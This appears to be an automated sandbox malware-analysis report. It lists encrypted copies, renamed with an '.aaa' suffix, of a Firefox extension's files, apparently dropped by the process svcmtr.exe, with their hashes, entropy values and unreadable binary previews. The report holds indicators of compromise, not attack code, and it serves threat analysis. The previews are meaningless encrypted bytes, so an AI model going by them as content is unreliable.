                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....Fl..1..S.0.......*..ZPju.....Z..w.....y..[e.L.9j.7..Q....l75.S.U.......i^.w...c....V..~.....OW.4.Z.r5.3{(s.I=..++Y.+rEZ+R.d..u....c.....6....$....[.x...6....Yeyt.F.....K.^..0.}.@..............QVL.\...Q..k..G.?.....Q.be....-..F...u?j.-W..N..?..2.9..V...B.?T1A.E.......P......0..r..i=.}.m.xMo...l#.W. bm.].KS^k3pJ...q....h.H&....#.E...5.Q.u.....;.4.2]c.?s.....<....Bu...i.....)....>e.o..v!..6..L)...NGR|v..2.....6&.L..*M....;u;..>T9..q<.$(.....S....{....n......Gx.bc.!.X.&..F.:u..J..N..{ :o.a.j..e._.g._..>._.C..$...K..hx.f-.e..7.g..!...,.J .0+.X.Z..G...Z...P!...?j..

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\playStore.png.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3118
                                                                                                                          Entropy (8bit):7.882394875701561
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDFXarlQu5Lrui+4cYMp2juOgvcI9RN:GoGQu5l+rYBjuOgvcIN
                                                                                                                          MD5:FC0CEC71A03C0C9BFD2FC5553215E3EE
                                                                                                                          SHA1:8FEED1414E442F4C2BC5B48D3D0CFA55D2AFDBAD
                                                                                                                          SHA-256:B7BF6060B1889992A130D14F6CAB106A9B74AA9B6CAEB59D436F47565B51CB41
                                                                                                                          SHA-512:0D3993C99FE0DC87E3AF819485BAEC175EF498EF96AE53A6EAD9D22009D374723102F872C80B90A390D84F6F067F67DE0D91D02648491B35224FEE264AE265AD
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..I...sFK.L...h0.....B..i.6....BFRa....e../...QLR,.M.....2....:..>.=FO.q.L@[..BV.2.;L.pt.V.+g..iNO:...:..U.9wv.t!...o.o&I.W.M.f.zd#.ip.e.%.@,...)..5..B.T.W1...k:!n.m....`.u/i..D}Y[.R<{......#../H.7..Et!'.$m..4..?0fi.m*..5.kt...w.o|........ny.N..[..*........i....g...=.p} ..y|..k.6Y..n.NwP..I...Y.=..X....2.M_q.U...h...y.M.F..Jk.........|y..i.!^..........0..i)..X..!.!...iE.7.!.A^.B+uI....B.!. .,5...NL.%..*.g..iM.:.cY...~.....L.>...9....gO@.....C![.{g^bcK.#..d!.......#.X4.[.....>..X>.dnx....@3..G..yd^.oS5o.V;3.....:..9h3.6.]..G>.L.C.O.h....h...v...'q.&...%c...9=.5.o41.\..#.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\index.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5742
                                                                                                                          Entropy (8bit):7.949931290360847
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDFSagknmNrVK23jMIvzXaYJhkx8tuR60YeKjFSV2u/1E47Pn8eqz3Ia6N3P:GoZtmNrE23jLvnbjt0YeKj0VO4r8/UP
                                                                                                                          MD5:17C2FE3D4DB92B74C7357C37DF75F751
                                                                                                                          SHA1:29575A8A49ED58124FFF938A00364E361ECF1032
                                                                                                                          SHA-256:48B20B65D6F275EBD217A948BE33824BA24F5796B2D25A59A2485F140BB30DE3
                                                                                                                          SHA-512:7869041F7566E143EF04451CA1957B410615704F712CED8A6A7ECEE24F1F567722CCAF5A4CF47AC7C4379A1F9FA06AF7395412AC13F64E8F96F13ABFCF1C0DB5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......-.Z..j.ui6.....v..._.T..c....B...I...WXWy.V|ZJ.....b..mb%...x..!r.7.+*.F...................wN..?$..{s]F-)ET.(..F..n...v.o..r. ..P\.*..v.':.$..E[y.D...{o...}..'.h`......d.A.w.=p.=2;..gH]....Sz........u......X."...>K.80.q...{.X....=....S.:Q....m.;....`=0e.5ca..\R.9?1UW..../...Z75,.....M.....t....b<...{...E.H...D...)..<.v...t........(g...M..k......_Pw.....t..3.h...-...!!.m...e...._m.<....._..AU29..@....Dp7..E.:`..f}....,hK.......n.......S5l..,.utg...h1...6..G.e...@.{.....$../B...u=)!Ui..(I$...,!^.ly.....*..}H.-)q..u..Q^mqW.d%.WW.....lo.d.....q..)'.#..-.}...Um!.H.t

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\about-home.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3358
                                                                                                                          Entropy (8bit):7.889410827723681
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDglaSYqo2lZbfkyhlfoUW+4HVIDj5PXgtOVM5NjCWDUGgyoFEwsPBlYOB:cztoD/qabE4+314eWwpytLXYMmx6
                                                                                                                          MD5:53F234C7D83A6716C5688AD4125CAC10
                                                                                                                          SHA1:2B53DC77E590D17DA70838B3A8568F7B28B371DD
                                                                                                                          SHA-256:985BCFDB2B27879F0A69C836246FF5059E7D10D990A874A0B4FE8F52C2FB0691
                                                                                                                          SHA-512:8D7661A9CF5C7F37B38594FB693901A5B8049F9E373EBB37ED40ADF184F0B4C54AA3976069EDB47E53476DED1B4B961A31F7B397515B42E36C81930E1853057D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....*...'........v.....$.-.d@.......u.D.w.W.....LL2:i....q-Zg...Qs.t....c^.;H.l.#._..<..b..-.c..<nb......V.=.X...M..........3G..V.......p@...y.Q......tA?..8{..j...wu..(..Y.....;.#Z..bH..H.s%+.V.......'..$S..%V.R.I..9.y..4..%.%..~.5.l*......d.].p.Jn....6..4*..z.;1l.?.3z!....'....Y3....f......0.....pu...(......tJv.\!0-O.xy.......z8..nkE3H.a8.u...,.p.M...c.~./...4.....v..x)}.*8IG.,...|.E.mX..-h..~.$...5.A.8X..~"D.R.z....}....|.,..A.....o.c.c.....Fi....f>...7>.i....<.....HA\...h...L.E.>-!..7.5../.S|(..z.%yC....>..X.{/...)J.....}~.X!...lH.1.8..L...v..L.LE.>.z.L.ye...%2.I%.M[.&e.....6..

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\firstrun.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7950
                                                                                                                          Entropy (8bit):7.963624534895654
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoGMJO30MWyOAvgTTu7AIOAY9iqmDURUr6VF:GEOEzyXGy7I9PmDUCuVF
                                                                                                                          MD5:EF8861DA734425161C41CD212CFDBBC4
                                                                                                                          SHA1:C4C7CE8D9D3900470EF4CC4CA438ADACEFC860C6
                                                                                                                          SHA-256:1AF67539332BBFED337B89F97DFC6188D65680515E911ADD41CC7EAE23953035
                                                                                                                          SHA-512:C27E1835537B0DE0B8EC820108BEC58C271C914F536CE6A31E6DC0D0F944B4CB4FF1FE3C9872338B97EA7B0EF3465E9286BDA0064490D5EA651385D0B6DD7D91
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...)..n.......iD.wh...H#.2o-...`.>Dv...G.....nq2...b...Q...f....q....7...r2.c.iR..f..m..O..0l9.5+..9......OY.Jg..5.Lx.!.Ly.N.<.v....m%....L....7...4d}......Oi.....0.q.40w.c.k...!s7P2(D..u..)...P....@ydf...O..Z]..'.M.M.P..c....Y..k.Gs.>...:...l..)...j..j...,..pl.F..i..+d...6...x....8R...B..l.#...3...P.."..Vx..F.D.....?.T..))..I/..&2.-.z..W,...2..+(.n.....[...QXU..D........-......6~.....w.........z @.w...|).i..N#....(./>..Uo.i.T.,..j..U\+.7..IU.j..^....z..5...`b.........7A.v.).S2.I.G.8.!.y..&..../>..|2......h~..I....U.<..u...K*..}.|d.....Q...Y(q.!.!......-...[..v~./..v...-&.t...GvI.

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\content-scripts\snippets.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1022
                                                                                                                          Entropy (8bit):7.407610323035598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2NRSSN4vNBY2znREGDsktrsfQvA1ypJXsL3:c+9U40oDgLzbREGIQeQCaJXsD
                                                                                                                          MD5:21EBE79E1EEB09CFDA3FE9C7D1D9CD0D
                                                                                                                          SHA1:92C4C4ED283624A3815B46C5DA3FB6BC77BFC910
                                                                                                                          SHA-256:D003672B2774B9BAE6CF650BE1B34F4A322B4AF130B09FC1C27BC783726F32E0
                                                                                                                          SHA-512:6091191A778793FD47BF2ECC29BAE9A13987DAB29A517F8F09C00E1E7CB0922917CA6B2CEFEBB23C3A458A234460C82ACA60EB830F58AC5DBCF657E86D8BCE27
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...(..g.:9us.0.k7S]...$..S..AS~n=.A..@E..... .!C.V..{..dP..;.,s...I.kS%.0>..?7..c.t...o~nh^...-..b=..RJ...s...}j..I42A.".C.4...m.....A7.[...l~.0.D.)O{...6...'......V.p#.."X.......Y......P.}P......>..jE..K.n..%F...,...&!*.?...;..k!....e....:..B...9q.....t............G......O-.wX@E.7..?.&..^..I...l.w.1..x.[..Y...lP..]'.2.i..J.F2......aL9/._..z.......^..\..l...h..q..j..e...P...c...KO.zv}Y.`u[..".&.H..&.9..?....7.s"....=...kF....\..X..6lT;...k......n..jg..t....U.~...hji...d!.|p...........X5.q......Lws.m....$.......}.*.l.U.a~.J..Z..G..Zo.'xrPF........Ed..%.3a..P.q......w..'..

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\intervals.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1118
                                                                                                                          Entropy (8bit):7.4994433044768725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2CQ2iXBo+JlxaC9LJ1bts3twhPd:c+9U40oDgrYBTJlxFXh1
                                                                                                                          MD5:23B2577AA073F3178AC179CA71DCBBAE
                                                                                                                          SHA1:5CBBB513F3721F5180E274FDF220930CDA7D1F00
                                                                                                                          SHA-256:A8FA0FE61505C25A40EE9BF054E7AA320D9C405DE3EDFF2ACC13820D7C4EA97B
                                                                                                                          SHA-512:719EA18589485172B5C47EB66D5B0451E8D9C619CDA95E1AA4B09B08B3A82BE4C69BD930604A8AEE77BA8EE4205FDC16FE90E7A00E20884E0CAC87EE54363595
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..2.j.......7........?..E..."..D.6O....).k.K........b&.g...~.8=...^>F.....-_.......J...M~6E..\_.4.T..}......!....c>G....?z.:...-d..._.....1.V.i..0.t...d_..q.N......z...d.D.a...bN..tdJ?...K..(J`..&...^.......j...?.....G....*.:........n.,..=Z.W....}N....._.|.........Z.#x....k..y>.....=...t5..B}"z*P.......hA%%V..2.V...}..hOz..p:.4.../....p..P#....p.~......L.....oq.......Fbx......V...E..%[...J.B..p.I.N......}...Xr5...hB..a....)....v...Uc..M..l.....Nh.9(.{.i....Q.Y.ao/.I.J.d.....+....eT. l..Q..l....X.d"L.T[.....\n...c.$...~.R....|)T(.Z3... b..2:dv.O...C..Q......I.aN..Y...:

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\notification-manager.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2686
                                                                                                                          Entropy (8bit):7.841598417414712
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgkRSxWKzQVOIpAEOxGErobhNlhkGa0jFEYSSdPYcfCk:cztoDFEQVOIpLOxGECNXNC4hKk
                                                                                                                          MD5:6CDC1F936EE5A8D64933BC288E268558
                                                                                                                          SHA1:917EF76A1DD35967DE19229DF2EC617E112159D4
                                                                                                                          SHA-256:BE4FB97BCC6514231334D5B242A07B6587C68D663780151BBF66CA3C0A3366AB
                                                                                                                          SHA-512:58189D865F5F99D9700A3EBE0046D4B7A18831B9B84C0BF5B5DEE76245A63ED67CF24F58AD6F0EB9DF417D3185CF89285E75D85CE67B8AD94C6533FF94E5162E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..n.L).-..d......q....1..:g......-....:....$6Qk.C.$..........Z...8...~..n..E`q.j.vA.}+...1..C;v2._...%..Qf.g.. ..A44.a+@..p..x...<...D..1...u..J.x..|6.g....3..8..sVm:3.N...F....e.{..O.....1.......'k5.....W..?.....`.o..z./.0.'.......V..p.......Z.]......Z2......-...{....q.<...o|..w.l..n3.S..........C@B@.i....F..zEg...... R....v.....oa....~yw.[W..z-....cs.+.Y.u+..D$W.{..fV.*?I.R..od.....]E..>..!(.....9>h.'....q.T......v.x*......D.....*....~...0....#.|.......8^$....D.6.a...k5....{...3q.F,..).K.Q..;N.......N....F)\.<..... M..Mb...)$.......e.t6k.1J7u.)%x..`kq..%.W..o.....3.a

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\scheduler.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9614
                                                                                                                          Entropy (8bit):7.970616820994937
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GozxK7sNJaudsUnL0Kt+fdt8O/8INsWy1AjmHu27eYeKecv6M3iQsE:GIxK7uksshKEfQA8ki1AqLAhMyQB
                                                                                                                          MD5:F1CCC967A9ACAE79D40D5644EF8F3FB5
                                                                                                                          SHA1:666BD13464EC22D8A3B142C71C7A14962CE3B33F
                                                                                                                          SHA-256:CA7ABD4980F44616E8285889E58B731DA9A75A36E7EB0C73BE1CAB25AF612757
                                                                                                                          SHA-512:FF79D1C296D061222626731EDF841EE0E19A3BB4E50819894DC4BFCA72C24296935BE03ACD35EDF6EC91157743DA0FF40E0A05628625ED4012DDA0B6D1E94BEF
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..M.S'Gdd.?.....G[.#..z.....#.K.|sa@..=....Ce.....s.....7..b......O..i...AdN...uI..#7.e.u..dd.;.P:K,H....g.(.@.n.j<....i..}#...t.KhT....c,.q.9..dO....W..G...@..t.8....*....).hJ....q..h.nI.a....i..S.^..'.l.v.~|;o3k.m.0.[.....W...p..."L.i...Y..h......!.O,....H7...D..O.9!Iy...^...f+.Y..]..O..N.N...,.....l...f...*.l.h.i..=5.....gw.[.-..c.R?.6.M....l...I.R....t.Ah..s]I..#.....P.....k.<..M.v_.Pd$R...*.2...Ol...8...\."P@.v.s....K.Yg........M.s..R?l9....;?qe.N...W.j.+..yF.D...uJ...._...{k..\...P>~2.~S...?}..`...8..tr....o....Ty'.I....B....e..4?..3....Z.CGqM~.......o....>d..L14W...

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\sidebar-events.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1294
                                                                                                                          Entropy (8bit):7.574045469388257
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2H/LYZo0LOOi+tMeBKMx10CbUfoh4xHWvHcaaGKEMG:c+9U40oDg48Zo6Qu1zUo4B0HcaLKe
                                                                                                                          MD5:BCD139CF463E642A5EB833BDAE3C16FC
                                                                                                                          SHA1:680FC6656B480FE846176760B1835ECE071B8A3D
                                                                                                                          SHA-256:1CC86DEEFB47B5FC17B40FCFBCE4B5B9FAA7E97C6BB172CA97002C8800D99D44
                                                                                                                          SHA-512:1F672C2AC5822978DAFE3A51AABA4E5C35BB25735C800FE445917C154346A0910916982CDA39E1FAAE8ADB5316E15B4FB3F44BBA15F44CAE8277B0C53285ED79
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..>....8...,#4<^f.i...c...}o..R...._P7A..F..j3...D..ET...mzC...S.).~.......6d-|.F..U.(.....Bu..H..y3....@kQa....9..OB...V0....q"E...y5-RvS.M...9.HsU....TD.v...Qv%.........@..z.G......o.m[.....;...#~.....aq....2mh..FLP...0B...u.......H..T...J.,........V..lp...<..X9.6.....e;.DV.,,.2.....#~..=8......V....DJH...m{...D...p.K'kR.g.H...~..*....Yr.{?_.D1...d90..N!w{.6.%=}...+....%.d.N.Q.:.a.".d....M*#..,<..K...~.......\.XF.9.. G.j.........{r.O....m#(......E.33..(......N......%..].z..L/.!`.?.?.f.cX.a*{n.t.....o,....?.D.b2....C.?C......F.nM.C.......1.O%.4`r...C.s..>...Sx/c..F.K'..

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\sidebar-manager.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15262
                                                                                                                          Entropy (8bit):7.986557814034618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GxnevkPuEdz/XWY2Z/0zFz7XtPgpARc2pItUUxfZkJ5T:GWkGEpPWYiC5Pgeq0URRwT
                                                                                                                          MD5:05B83CB7388292C0AE9B7FD82365325F
                                                                                                                          SHA1:ACB59E69D90E0CB07E640CEA4BFFD7CDC447A379
                                                                                                                          SHA-256:57C99137A45A6A5FC05C8094FBFC39B1CB37038919D092421CDEBA1EE0C65B59
                                                                                                                          SHA-512:4B8E2E7DA595BB02DFD92C78D706F0E4AEFA329C5FD50EEDE1E1935E5E5CB7ED80DC32794511DE44E6839774CB34E9E7F9CAE09F17C216348CE32CACF469616F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264........(.+}v.jT.9..z... .\D.iG.u...Pq*...W<...!...:.-.W.........7..Nl.+I..'K....s..K.w..3.h.t.ds...)...;G|.).K...Zoh..C.{~....T......w-.+.(.....^...-.......O.J)..n`..dp..P<I...<z.f..sNqsp).....{....%XE.p`u....).j.g.,....yC..gE.+.Z...U.F.......6l...U.. "....b...........v./......../..d.-+../.qH.$...."..%.y[...],...C.8.....a...M.......9.d8Do.R.qj..by,..y.=..>.b..I9&6-3Q{.-=..fc=.....>o@=R~...r;.h.L..Ft.8.`L94H........C". [.7.t.^.^<}s`d.....$.k'.-}...GrS..JP.N.T|c..x.'..K}Yw.'.C...l.Z=..IlK}...Ix....X^DY............vA..zO2.Ni..Q.q...!..,.]..n{.Y.Z.7....CS....*..."..+.1..-..i.....

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\sidebar-utils.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3774
                                                                                                                          Entropy (8bit):7.919865270631616
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDr2KKpXdPjJm+qcrrvjxyg7kYHDS63rNdogCmYEW:GovKpXJjJmpcXvMgPHtQ0W
                                                                                                                          MD5:CFBF54037B241242BA12F5133D729494
                                                                                                                          SHA1:0C54A179826DDE53AE16B2650F301D4CA1340A90
                                                                                                                          SHA-256:0D48742FA5E30D0A0C22865C3DB0E1A2D9BC7487BC768F15CCB03148B984BDC5
                                                                                                                          SHA-512:23966D1F07DC3D0DDE30592762178EF8C373F5ECC12AFF0FC78B8497E93C5BBA604F84896E8A730E493DD670B56E7D222B11CC924C363750D61CDEB443B3A42D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...n......[*.PL. ......e.x... .......w.2.s..\..p..T..t.E.L.i7.;F...*.'../....F<.V.....g.l_g........L..L....@2.....'x.....Y./u:...u.T..j.C..*....;P...(.P........2.w..."...S.......<....Y.H.k......$.q`S&.......e>&i..sYi..A.$......W.@.Q.D.`........}....;E.g.._.x.M....H]!9....<&5..._H.....kdt1....`u..]...a.........3..e8..a.g.RK&....ui.9.......r..P)...A3.9..$2%.w(s. :...m].w.Z%f*.?xj.......O.~{....^.UA8..[..JJ.Txc|BG...j`....(...b......a......F.\....Q.....T%..=.....2b.......q.Ur?%r.,...3A.....`D.O}.a...."...Gl..G?..J..6......{.y..5..o.b..r...7wZI...*.h......zr..

                                                                                                                          C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\lib\storage-manager.js.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1246
                                                                                                                          Entropy (8bit):7.567557577813457
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2rF8frayappbN8WeTt/T9CbjnIFmxSlFvvUkmSsrW:c+9U40oDgjGyappbNwTt/GnE02FvvUkX
                                                                                                                          MD5:CA33303BA0FB6CBFF7499FF620601D29
                                                                                                                          SHA1:4C8A461E63226AEBB5A1C86EE1D7EA250827FC84
                                                                                                                          SHA-256:D3AD4F537428C52B34FDBBD80158891E9096C9E4E3315CED568B5B035F27D6C7
                                                                                                                          SHA-512:CE51DB71656900E25251E5F1CFC5CC7DE02383597F71A7A3304A246E74FA7D7026EA61E93718A21AFF1560BD6E78A734C4503459EE5653DC2469C2F2793C2952
                                                                                                                          Malicious:false
